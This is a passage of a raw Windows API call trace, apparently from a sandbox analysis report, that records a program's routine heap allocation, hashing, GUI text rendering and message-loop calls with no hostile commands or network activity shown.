pbHash=0x197bd4) returned 0x0 [0181.187] HashData (in: pbData=0x6d7e14, cbData=0x8, pbHash=0x197bc0, cbHash=0x2 | out: pbHash=0x197bc0) returned 0x0 [0181.187] HashData (in: pbData=0x6d7e1c, cbData=0x8, pbHash=0x197bc0, cbHash=0x2 | out: pbHash=0x197bc0) returned 0x0 [0181.187] HashData (in: pbData=0x6d7e24, cbData=0x2, pbHash=0x197bc0, cbHash=0x2 | out: pbHash=0x197bc0) returned 0x0 [0181.187] HashData (in: pbData=0x6d7e26, cbData=0x2, pbHash=0x197bc0, cbHash=0x2 | out: pbHash=0x197bc0) returned 0x0 [0181.187] HashData (in: pbData=0x6d7e28, cbData=0x8, pbHash=0x197bc0, cbHash=0x2 | out: pbHash=0x197bc0) returned 0x0 [0181.187] HashData (in: pbData=0x6d7e30, cbData=0x8, pbHash=0x197bc0, cbHash=0x2 | out: pbHash=0x197bc0) returned 0x0 [0181.187] HashData (in: pbData=0x197bec, cbData=0x4, pbHash=0x197bd8, cbHash=0x2 | out: pbHash=0x197bd8) returned 0x0 [0181.189] HashData (in: pbData=0x6d7e3c, cbData=0x8, pbHash=0x197bd4, cbHash=0x2 | out: pbHash=0x197bd4) returned 0x0 [0181.189] HashData (in: pbData=0x6d7e44, cbData=0x8, pbHash=0x197bc0, cbHash=0x2 | out: pbHash=0x197bc0) returned 0x0 [0181.189] HashData (in: pbData=0x6d7e50, cbData=0x4, pbHash=0x197bd4, cbHash=0x2 | out: pbHash=0x197bd4) returned 0x0 [0181.189] HashData (in: pbData=0x6d7e54, cbData=0x8, pbHash=0x197bd4, cbHash=0x2 | out: pbHash=0x197bd4) returned 0x0 [0181.189] HashData (in: pbData=0x6d7e5c, cbData=0x8, pbHash=0x197bc0, cbHash=0x2 | out: pbHash=0x197bc0) returned 0x0 [0181.189] HashData (in: pbData=0x6d7e68, cbData=0x4, pbHash=0x197bd4, cbHash=0x2 | out: pbHash=0x197bd4) returned 0x0 [0181.189] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d7e08 | out: hHeap=0x5e0000) returned 1 [0181.189] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9f830d0 | out: hHeap=0x5e0000) returned 1 [0181.189] HashData (in: pbData=0x9ee6b40, cbData=0x1, pbHash=0x197bdc, cbHash=0x2 | out: pbHash=0x197bdc) returned 0x0 [0181.189] HashData (in: pbData=0x197bf4, cbData=0x4, pbHash=0x197bdc, cbHash=0x2 | out: pbHash=0x197bdc) returned 0x0 [0181.189] HashData (in: pbData=0x9ee6b44, cbData=0x4, pbHash=0x197bf8, cbHash=0x2 | out: pbHash=0x197bf8) returned 0x0 [0181.190] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9ee6b40 | out: hHeap=0x5e0000) returned 1 [0181.190] GetFocus () returned 0x0 [0181.190] EnumChildWindows (hWndParent=0x103e2, lpEnumFunc=0x6e0775e0, lParam=0x197a37) returned 0 [0181.190] GetFocus () returned 0x0 [0181.190] EnumChildWindows (hWndParent=0x103e2, lpEnumFunc=0x6e0775e0, lParam=0x197a43) returned 0 [0181.190] GetSysColor (nIndex=15) returned 0xf0f0f0 [0181.191] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d7bd8 | out: hHeap=0x5e0000) returned 1 [0181.191] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x64) returned 0x6d7e78 [0181.191] _CIsqrt () returned 0x407b027f [0181.191] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x8) returned 0x9ee6b30 [0181.191] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0181.191] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0181.192] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9ee6b30 | out: hHeap=0x5e0000) returned 1 [0181.192] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x54) returned 0x6dd9b8 [0181.192] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0181.192] HashData (in: pbData=0xd954d0, cbData=0x28, pbHash=0x197404, cbHash=0x4 | out: pbHash=0x197404) returned 0x0 [0181.193] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6dd9b8 | out: hHeap=0x5e0000) returned 1 [0181.193] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x8) returned 0x9ee6ae0 [0181.193] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x9f83190 [0181.193] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x64) returned 0x6d7af8 [0181.193] HashData (in: pbData=0x9f83194, cbData=0x4, pbHash=0x9f83198, cbHash=0x2 | out: pbHash=0x9f83198) returned 0x0 [0181.194] HashData (in: pbData=0x6d7af8, cbData=0x2, pbHash=0x197bc0, cbHash=0x2 | out: pbHash=0x197bc0) returned 0x0 [0181.194] HashData (in: pbData=0x6d7afa, cbData=0x2, pbHash=0x197bc0, cbHash=0x2 | out: pbHash=0x197bc0) returned 0x0 [0181.194] HashData (in: pbData=0x6d7afc, cbData=0x8, pbHash=0x197bd4, cbHash=0x2 | out: pbHash=0x197bd4) returned 0x0 [0181.194] HashData (in: pbData=0x6d7b04, cbData=0x8, pbHash=0x197bc0, cbHash=0x2 | out: pbHash=0x197bc0) returned 0x0 [0181.194] HashData (in: pbData=0x6d7b0c, cbData=0x8, pbHash=0x197bc0, cbHash=0x2 | out: pbHash=0x197bc0) returned 0x0 [0181.194] HashData (in: pbData=0x6d7b14, cbData=0x2, pbHash=0x197bc0, cbHash=0x2 | out: pbHash=0x197bc0) returned 0x0 [0181.194] HashData (in: pbData=0x6d7b16, cbData=0x2, pbHash=0x197bc0, cbHash=0x2 | out: pbHash=0x197bc0) returned 0x0 [0181.195] HashData (in: pbData=0x6d7b18, cbData=0x8, pbHash=0x197bc0, cbHash=0x2 | out: pbHash=0x197bc0) returned 0x0 [0181.195] HashData (in: pbData=0x6d7b20, cbData=0x8, pbHash=0x197bc0, cbHash=0x2 | out: pbHash=0x197bc0) returned 0x0 [0181.195] HashData (in: pbData=0x197bec, cbData=0x4, pbHash=0x197bd8, cbHash=0x2 | out: pbHash=0x197bd8) returned 0x0 [0181.195] HashData (in: pbData=0x6d7b2c, cbData=0x8, pbHash=0x197bd4, cbHash=0x2 | out: pbHash=0x197bd4) returned 0x0 [0181.195] HashData (in: pbData=0x6d7b34, cbData=0x8, pbHash=0x197bc0, cbHash=0x2 | out: pbHash=0x197bc0) returned 0x0 [0181.195] HashData (in: pbData=0x6d7b40, cbData=0x4, pbHash=0x197bd4, cbHash=0x2 | out: pbHash=0x197bd4) returned 0x0 [0181.195] HashData (in: pbData=0x6d7b44, cbData=0x8, pbHash=0x197bd4, cbHash=0x2 | out: pbHash=0x197bd4) returned 0x0 [0181.195] HashData (in: pbData=0x6d7b4c, cbData=0x8, pbHash=0x197bc0, cbHash=0x2 | out: pbHash=0x197bc0) returned 0x0 [0181.195] HashData (in: pbData=0x6d7b58, cbData=0x4, pbHash=0x197bd4, cbHash=0x2 | out: pbHash=0x197bd4) returned 0x0 [0181.196] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d7af8 | out: hHeap=0x5e0000) returned 1 [0181.196] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9f83190 | out: hHeap=0x5e0000) returned 1 [0181.196] HashData (in: pbData=0x9ee6ae0, cbData=0x1, pbHash=0x197bdc, cbHash=0x2 | out: pbHash=0x197bdc) returned 0x0 [0181.196] HashData (in: pbData=0x197bf4, cbData=0x4, pbHash=0x197bdc, cbHash=0x2 | out: pbHash=0x197bdc) returned 0x0 [0181.196] HashData (in: pbData=0x9ee6ae4, cbData=0x4, pbHash=0x197bf8, cbHash=0x2 | out: pbHash=0x197bf8) returned 0x0 [0181.196] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9ee6ae0 | out: hHeap=0x5e0000) returned 1 [0181.196] GetFocus () returned 0x0 [0181.196] EnumChildWindows (hWndParent=0x103e2, lpEnumFunc=0x6e0775e0, lParam=0x197ba7) returned 0 [0181.197] GetFocus () returned 0x0 [0181.197] EnumChildWindows (hWndParent=0x103e2, lpEnumFunc=0x6e0775e0, lParam=0x197b63) returned 0 [0181.197] GetFocus () returned 0x0 [0181.197] EnumChildWindows (hWndParent=0x103e2, lpEnumFunc=0x6e0775e0, lParam=0x197b6f) returned 0 [0181.197] MulDiv (nNumber=1, nNumerator=1, nDenominator=1) returned 1 [0181.197] MulDiv (nNumber=1, nNumerator=0, nDenominator=1) returned 0 [0181.197] MulDiv (nNumber=1, nNumerator=0, nDenominator=1) returned 0 [0181.197] MulDiv (nNumber=1, nNumerator=0, nDenominator=1) returned 0 [0181.197] MulDiv (nNumber=1, nNumerator=1, nDenominator=1) returned 1 [0181.197] MulDiv (nNumber=1, nNumerator=1, nDenominator=1) returned 1 [0181.198] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x9f82fb0 [0181.199] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0181.199] MulDiv (nNumber=1, nNumerator=1, nDenominator=1) returned 1 [0181.199] MulDiv (nNumber=1, nNumerator=0, nDenominator=1) returned 0 [0181.199] MulDiv (nNumber=1, nNumerator=0, nDenominator=1) returned 0 [0181.199] MulDiv (nNumber=1, nNumerator=0, nDenominator=1) returned 0 [0181.199] MulDiv (nNumber=1, nNumerator=1, nDenominator=1) returned 1 [0181.199] MulDiv (nNumber=1, nNumerator=1, nDenominator=1) returned 1 [0181.200] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x9f83190 [0181.201] GetSysColor (nIndex=15) returned 0xf0f0f0 [0181.201] GetSysColor (nIndex=15) returned 0xf0f0f0 [0181.202] GetSysColor (nIndex=15) returned 0xf0f0f0 [0181.202] GetSysColor (nIndex=15) returned 0xf0f0f0 [0181.203] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0181.203] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x9f83028 [0181.204] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9f82fb0 | out: hHeap=0x5e0000) returned 1 [0181.204] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9f83190 | out: hHeap=0x5e0000) returned 1 [0181.205] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9f83028 | out: hHeap=0x5e0000) returned 1 [0181.205] LsSetDoc () returned 0x0 [0181.205] LsCreateLine () returned 0x0 [0181.206] LsDisplayLine () returned 0x0 [0181.209] LsDestroyLine () returned 0x0 [0181.209] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x8) returned 0x9ee6a20 [0181.209] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x9f831a8 [0181.210] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x64) returned 0x6d7e08 [0181.210] HashData (in: pbData=0x9f831ac, cbData=0x4, pbHash=0x9f831b0, cbHash=0x2 | out: pbHash=0x9f831b0) returned 0x0 [0181.210] HashData (in: pbData=0x6d7e08, cbData=0x2, pbHash=0x197bc0, cbHash=0x2 | out: pbHash=0x197bc0) returned 0x0 [0181.210] HashData (in: pbData=0x6d7e0a, cbData=0x2, pbHash=0x197bc0, cbHash=0x2 | out: pbHash=0x197bc0) returned 0x0 [0181.210] HashData (in: pbData=0x6d7e0c, cbData=0x8, pbHash=0x197bd4, cbHash=0x2 | out: pbHash=0x197bd4) returned 0x0 [0181.211] HashData (in: pbData=0x6d7e14, cbData=0x8, pbHash=0x197bc0, cbHash=0x2 | out: pbHash=0x197bc0) returned 0x0 [0181.211] HashData (in: pbData=0x6d7e1c, cbData=0x8, pbHash=0x197bc0, cbHash=0x2 | out: pbHash=0x197bc0) returned 0x0 [0181.211] HashData (in: pbData=0x6d7e24, cbData=0x2, pbHash=0x197bc0, cbHash=0x2 | out: pbHash=0x197bc0) returned 0x0 [0181.211] HashData (in: pbData=0x6d7e26, cbData=0x2, pbHash=0x197bc0, cbHash=0x2 | out: pbHash=0x197bc0) returned 0x0 [0181.211] HashData (in: pbData=0x6d7e28, cbData=0x8, pbHash=0x197bc0, cbHash=0x2 | out: pbHash=0x197bc0) returned 0x0 [0181.211] HashData (in: pbData=0x6d7e30, cbData=0x8, pbHash=0x197bc0, cbHash=0x2 | out: pbHash=0x197bc0) returned 0x0 [0181.211] HashData (in: pbData=0x197bec, cbData=0x4, pbHash=0x197bd8, cbHash=0x2 | out: pbHash=0x197bd8) returned 0x0 [0181.211] HashData (in: pbData=0x6d7e3c, cbData=0x8, pbHash=0x197bd4, cbHash=0x2 | out: pbHash=0x197bd4) returned 0x0 [0181.211] HashData (in: pbData=0x6d7e44, cbData=0x8, pbHash=0x197bc0, cbHash=0x2 | out: pbHash=0x197bc0) returned 0x0 [0181.211] HashData (in: pbData=0x6d7e50, cbData=0x4, pbHash=0x197bd4, cbHash=0x2 | out: pbHash=0x197bd4) returned 0x0 [0181.211] HashData (in: pbData=0x6d7e54, cbData=0x8, pbHash=0x197bd4, cbHash=0x2 | out: pbHash=0x197bd4) returned 0x0 [0181.211] HashData (in: pbData=0x6d7e5c, cbData=0x8, pbHash=0x197bc0, cbHash=0x2 | out: pbHash=0x197bc0) returned 0x0 [0181.211] HashData (in: pbData=0x6d7e68, cbData=0x4, pbHash=0x197bd4, cbHash=0x2 | out: pbHash=0x197bd4) returned 0x0 [0181.212] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d7e08 | out: hHeap=0x5e0000) returned 1 [0181.212] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9f831a8 | out: hHeap=0x5e0000) returned 1 [0181.212] HashData (in: pbData=0x9ee6a20, cbData=0x1, pbHash=0x197bdc, cbHash=0x2 | out: pbHash=0x197bdc) returned 0x0 [0181.212] HashData (in: pbData=0x197bf4, cbData=0x4, pbHash=0x197bdc, cbHash=0x2 | out: pbHash=0x197bdc) returned 0x0 [0181.212] HashData (in: pbData=0x9ee6a24, cbData=0x4, pbHash=0x197bf8, cbHash=0x2 | out: pbHash=0x197bf8) returned 0x0 [0181.212] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9ee6a20 | out: hHeap=0x5e0000) returned 1 [0181.212] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x8) returned 0x9ee6ad0 [0181.212] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x9f82f98 [0181.212] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x64) returned 0x6d7a88 [0181.212] HashData (in: pbData=0x9f82f9c, cbData=0x4, pbHash=0x9f82fa0, cbHash=0x2 | out: pbHash=0x9f82fa0) returned 0x0 [0181.212] HashData (in: pbData=0x6d7a88, cbData=0x2, pbHash=0x197bc0, cbHash=0x2 | out: pbHash=0x197bc0) returned 0x0 [0181.212] HashData (in: pbData=0x6d7a8a, cbData=0x2, pbHash=0x197bc0, cbHash=0x2 | out: pbHash=0x197bc0) returned 0x0 [0181.213] HashData (in: pbData=0x6d7a8c, cbData=0x8, pbHash=0x197bd4, cbHash=0x2 | out: pbHash=0x197bd4) returned 0x0 [0181.213] HashData (in: pbData=0x6d7a94, cbData=0x8, pbHash=0x197bc0, cbHash=0x2 | out: pbHash=0x197bc0) returned 0x0 [0181.213] HashData (in: pbData=0x6d7a9c, cbData=0x8, pbHash=0x197bc0, cbHash=0x2 | out: pbHash=0x197bc0) returned 0x0 [0181.213] HashData (in: pbData=0x6d7aa4, cbData=0x2, pbHash=0x197bc0, cbHash=0x2 | out: pbHash=0x197bc0) returned 0x0 [0181.213] HashData (in: pbData=0x6d7aa6, cbData=0x2, pbHash=0x197bc0, cbHash=0x2 | out: pbHash=0x197bc0) returned 0x0 [0181.213] HashData (in: pbData=0x6d7aa8, cbData=0x8, pbHash=0x197bc0, cbHash=0x2 | out: pbHash=0x197bc0) returned 0x0 [0181.213] HashData (in: pbData=0x6d7ab0, cbData=0x8, pbHash=0x197bc0, cbHash=0x2 | out: pbHash=0x197bc0) returned 0x0 [0181.213] HashData (in: pbData=0x197bec, cbData=0x4, pbHash=0x197bd8, cbHash=0x2 | out: pbHash=0x197bd8) returned 0x0 [0181.213] HashData (in: pbData=0x6d7abc, cbData=0x8, pbHash=0x197bd4, cbHash=0x2 | out: pbHash=0x197bd4) returned 0x0 [0181.213] HashData (in: pbData=0x6d7ac4, cbData=0x8, pbHash=0x197bc0, cbHash=0x2 | out: pbHash=0x197bc0) returned 0x0 [0181.213] HashData (in: pbData=0x6d7ad0, cbData=0x4, pbHash=0x197bd4, cbHash=0x2 | out: pbHash=0x197bd4) returned 0x0 [0181.213] HashData (in: pbData=0x6d7ad4, cbData=0x8, pbHash=0x197bd4, cbHash=0x2 | out: pbHash=0x197bd4) returned 0x0 [0181.213] HashData (in: pbData=0x6d7adc, cbData=0x8, pbHash=0x197bc0, cbHash=0x2 | out: pbHash=0x197bc0) returned 0x0 [0181.213] HashData (in: pbData=0x6d7ae8, cbData=0x4, pbHash=0x197bd4, cbHash=0x2 | out: pbHash=0x197bd4) returned 0x0 [0181.213] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d7a88 | out: hHeap=0x5e0000) returned 1 [0181.213] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9f82f98 | out: hHeap=0x5e0000) returned 1 [0181.214] HashData (in: pbData=0x9ee6ad0, cbData=0x1, pbHash=0x197bdc, cbHash=0x2 | out: pbHash=0x197bdc) returned 0x0 [0181.215] HashData (in: pbData=0x197bf4, cbData=0x4, pbHash=0x197bdc, cbHash=0x2 | out: pbHash=0x197bdc) returned 0x0 [0181.215] HashData (in: pbData=0x9ee6ad4, cbData=0x4, pbHash=0x197bf8, cbHash=0x2 | out: pbHash=0x197bf8) returned 0x0 [0181.215] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9ee6ad0 | out: hHeap=0x5e0000) returned 1 [0181.215] GetSysColor (nIndex=15) returned 0xf0f0f0 [0181.216] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d7e78 | out: hHeap=0x5e0000) returned 1 [0181.216] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x64) returned 0x6d77e8 [0181.216] _CIsqrt () returned 0x407b027f [0181.216] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x8) returned 0x9ee6a20 [0181.216] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0181.218] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0181.218] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9ee6a20 | out: hHeap=0x5e0000) returned 1 [0181.218] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x54) returned 0x6ddcb8 [0181.218] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0181.288] HashData (in: pbData=0xd95530, cbData=0x28, pbHash=0x197404, cbHash=0x4 | out: pbHash=0x197404) returned 0x0 [0181.289] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6ddcb8 | out: hHeap=0x5e0000) returned 1 [0181.289] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x8) returned 0x9ee6a20 [0181.289] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x9f83040 [0181.289] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x64) returned 0x6d7858 [0181.289] HashData (in: pbData=0x9f83044, cbData=0x4, pbHash=0x9f83048, cbHash=0x2 | out: pbHash=0x9f83048) returned 0x0 [0181.289] HashData (in: pbData=0x6d7858, cbData=0x2, pbHash=0x197bc0, cbHash=0x2 | out: pbHash=0x197bc0) returned 0x0 [0181.289] HashData (in: pbData=0x6d785a, cbData=0x2, pbHash=0x197bc0, cbHash=0x2 | out: pbHash=0x197bc0) returned 0x0 [0181.289] HashData (in: pbData=0x6d785c, cbData=0x8, pbHash=0x197bd4, cbHash=0x2 | out: pbHash=0x197bd4) returned 0x0 [0181.289] HashData (in: pbData=0x6d7864, cbData=0x8, pbHash=0x197bc0, cbHash=0x2 | out: pbHash=0x197bc0) returned 0x0 [0181.289] HashData (in: pbData=0x6d786c, cbData=0x8, pbHash=0x197bc0, cbHash=0x2 | out: pbHash=0x197bc0) returned 0x0 [0181.289] HashData (in: pbData=0x6d7874, cbData=0x2, pbHash=0x197bc0, cbHash=0x2 | out: pbHash=0x197bc0) returned 0x0 [0181.289] HashData (in: pbData=0x6d7876, cbData=0x2, pbHash=0x197bc0, cbHash=0x2 | out: pbHash=0x197bc0) returned 0x0 [0181.289] HashData (in: pbData=0x6d7878, cbData=0x8, pbHash=0x197bc0, cbHash=0x2 | out: pbHash=0x197bc0) returned 0x0 [0181.289] HashData (in: pbData=0x6d7880, cbData=0x8, pbHash=0x197bc0, cbHash=0x2 | out: pbHash=0x197bc0) returned 0x0 [0181.290] HashData (in: pbData=0x197bec, cbData=0x4, pbHash=0x197bd8, cbHash=0x2 | out: pbHash=0x197bd8) returned 0x0 [0181.290] HashData (in: pbData=0x6d788c, cbData=0x8, pbHash=0x197bd4, cbHash=0x2 | out: pbHash=0x197bd4) returned 0x0 [0181.290] HashData (in: pbData=0x6d7894, cbData=0x8, pbHash=0x197bc0, cbHash=0x2 | out: pbHash=0x197bc0) returned 0x0 [0181.290] HashData (in: pbData=0x6d78a0, cbData=0x4, pbHash=0x197bd4, cbHash=0x2 | out: pbHash=0x197bd4) returned 0x0 [0181.294] HashData (in: pbData=0x6d78a4, cbData=0x8, pbHash=0x197bd4, cbHash=0x2 | out: pbHash=0x197bd4) returned 0x0 [0181.294] HashData (in: pbData=0x6d78ac, cbData=0x8, pbHash=0x197bc0, cbHash=0x2 | out: pbHash=0x197bc0) returned 0x0 [0181.294] HashData (in: pbData=0x6d78b8, cbData=0x4, pbHash=0x197bd4, cbHash=0x2 | out: pbHash=0x197bd4) returned 0x0 [0181.294] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d7858 | out: hHeap=0x5e0000) returned 1 [0181.294] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9f83040 | out: hHeap=0x5e0000) returned 1 [0181.294] HashData (in: pbData=0x9ee6a20, cbData=0x1, pbHash=0x197bdc, cbHash=0x2 | out: pbHash=0x197bdc) returned 0x0 [0181.294] HashData (in: pbData=0x197bf4, cbData=0x4, pbHash=0x197bdc, cbHash=0x2 | out: pbHash=0x197bdc) returned 0x0 [0181.294] HashData (in: pbData=0x9ee6a24, cbData=0x4, pbHash=0x197bf8, cbHash=0x2 | out: pbHash=0x197bf8) returned 0x0 [0181.295] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9ee6a20 | out: hHeap=0x5e0000) returned 1 [0181.295] MulDiv (nNumber=1, nNumerator=1, nDenominator=1) returned 1 [0181.295] MulDiv (nNumber=1, nNumerator=0, nDenominator=1) returned 0 [0181.295] MulDiv (nNumber=1, nNumerator=0, nDenominator=1) returned 0 [0181.295] MulDiv (nNumber=1, nNumerator=0, nDenominator=1) returned 0 [0181.295] MulDiv (nNumber=1, nNumerator=1, nDenominator=1) returned 1 [0181.295] MulDiv (nNumber=1, nNumerator=1, nDenominator=1) returned 1 [0181.296] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x9f82f68 [0181.296] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0181.296] MulDiv (nNumber=1, nNumerator=1, nDenominator=1) returned 1 [0181.296] MulDiv (nNumber=1, nNumerator=0, nDenominator=1) returned 0 [0181.296] MulDiv (nNumber=1, nNumerator=0, nDenominator=1) returned 0 [0181.296] MulDiv (nNumber=1, nNumerator=0, nDenominator=1) returned 0 [0181.296] MulDiv (nNumber=1, nNumerator=1, nDenominator=1) returned 1 [0181.296] MulDiv (nNumber=1, nNumerator=1, nDenominator=1) returned 1 [0181.297] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x9f82f80 [0181.298] GetSysColor (nIndex=15) returned 0xf0f0f0 [0181.299] GetSysColor (nIndex=15) returned 0xf0f0f0 [0181.299] GetSysColor (nIndex=15) returned 0xf0f0f0 [0181.300] GetSysColor (nIndex=15) returned 0xf0f0f0 [0181.300] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0181.300] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x9f83130 [0181.301] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9f82f68 | out: hHeap=0x5e0000) returned 1 [0181.302] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9f82f80 | out: hHeap=0x5e0000) returned 1 [0181.302] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9f83130 | out: hHeap=0x5e0000) returned 1 [0181.302] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x68bd28 | out: hHeap=0x5e0000) returned 1 [0181.346] GetClientRect (in: hWnd=0x103e2, lpRect=0x199cbc | out: lpRect=0x199cbc) returned 1 [0181.346] BitBlt (hdc=0x51010a85, x=171, y=213, cx=42, cy=23, hdcSrc=0x8e01071c, x1=171, y1=213, rop=0xcc0020) returned 1 [0181.346] ReleaseDC (hWnd=0x103e2, hDC=0x51010a85) returned 1 [0181.347] ReleaseDC (hWnd=0x103e2, hDC=0xb010541) returned 1 [0181.347] QueryPerformanceCounter (in: lpPerformanceCount=0x199dd8 | out: lpPerformanceCount=0x199dd8*=3100016572416) returned 1 [0181.347] DeleteObject (ho=0x2b040a81) returned 1 [0181.348] GetCurrentThreadId () returned 0xb48 [0181.348] InitOnceExecuteOnce (in: InitOnce=0x6e89927c, InitFn=0x6dd8e660, Parameter=0x0, Context=0x0 | out: InitOnce=0x6e89927c, Parameter=0x0, Context=0x0) returned 1 [0181.348] QueryPerformanceCounter (in: lpPerformanceCount=0x19a2f0 | out: lpPerformanceCount=0x19a2f0*=3100016691713) returned 1 [0181.348] QueryPerformanceCounter (in: lpPerformanceCount=0x19a300 | out: lpPerformanceCount=0x19a300*=3100016703319) returned 1 [0181.348] KillTimer (hWnd=0x30316, uIDEvent=0x202a) returned 1 [0181.349] QueryPerformanceCounter (in: lpPerformanceCount=0x19a2c0 | out: lpPerformanceCount=0x19a2c0*=3100016763550) returned 1 [0181.349] SetEvent (hEvent=0x304) returned 1 [0181.350] GetMessageW (in: lpMsg=0x19a5a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x19a5a8) returned 1 [0181.350] TranslateMessage (lpMsg=0x19a5a8) returned 0 [0181.350] DispatchMessageW (lpMsg=0x19a5a8) returned 0x0 [0181.350] GetWindowLongW (hWnd=0x103e4, nIndex=-21) returned 7140024 [0181.350] PeekMessageW (in: lpMsg=0x19a3fc, hWnd=0x103e4, wMsgFilterMin=0x401, wMsgFilterMax=0x401, wRemoveMsg=0x3 | out: lpMsg=0x19a3fc) returned 1 [0181.350] PeekMessageW (in: lpMsg=0x19a3fc, hWnd=0x103e4, wMsgFilterMin=0x401, wMsgFilterMax=0x401, wRemoveMsg=0x3 | out: lpMsg=0x19a3fc) returned 1 [0181.351] PeekMessageW (in: lpMsg=0x19a3fc, hWnd=0x103e4, wMsgFilterMin=0x401, wMsgFilterMax=0x401, wRemoveMsg=0x3 | out: lpMsg=0x19a3fc) returned 1 [0181.351] PeekMessageW (in: lpMsg=0x19a3fc, hWnd=0x103e4, wMsgFilterMin=0x401, wMsgFilterMax=0x401, wRemoveMsg=0x3 | out: lpMsg=0x19a3fc) returned 1 [0181.351] PeekMessageW (in: lpMsg=0x19a3fc, hWnd=0x103e4, wMsgFilterMin=0x401, wMsgFilterMax=0x401, wRemoveMsg=0x3 | out: lpMsg=0x19a3fc) returned 1 [0181.351] PeekMessageW (in: lpMsg=0x19a3fc, hWnd=0x103e4, wMsgFilterMin=0x401, wMsgFilterMax=0x401, wRemoveMsg=0x3 | out: lpMsg=0x19a3fc) returned 1 [0181.351] PeekMessageW (in: lpMsg=0x19a3fc, hWnd=0x103e4, wMsgFilterMin=0x401, wMsgFilterMax=0x401, wRemoveMsg=0x3 | out: lpMsg=0x19a3fc) returned 1 [0181.351] PeekMessageW (in: lpMsg=0x19a3fc, hWnd=0x103e4, wMsgFilterMin=0x401, wMsgFilterMax=0x401, wRemoveMsg=0x3 | out: lpMsg=0x19a3fc) returned 1 [0181.351] PeekMessageW (in: lpMsg=0x19a3fc, hWnd=0x103e4, wMsgFilterMin=0x401, wMsgFilterMax=0x401, wRemoveMsg=0x3 | out: lpMsg=0x19a3fc) returned 1 [0181.351] PeekMessageW (in: lpMsg=0x19a3fc, hWnd=0x103e4, wMsgFilterMin=0x401, wMsgFilterMax=0x401, wRemoveMsg=0x3 | out: lpMsg=0x19a3fc) returned 1 [0181.351] PeekMessageW (in: lpMsg=0x19a3fc, hWnd=0x103e4, wMsgFilterMin=0x401, wMsgFilterMax=0x401, wRemoveMsg=0x3 | out: lpMsg=0x19a3fc) returned 0 [0181.351] QueryPerformanceCounter (in: lpPerformanceCount=0x19a3bc | out: 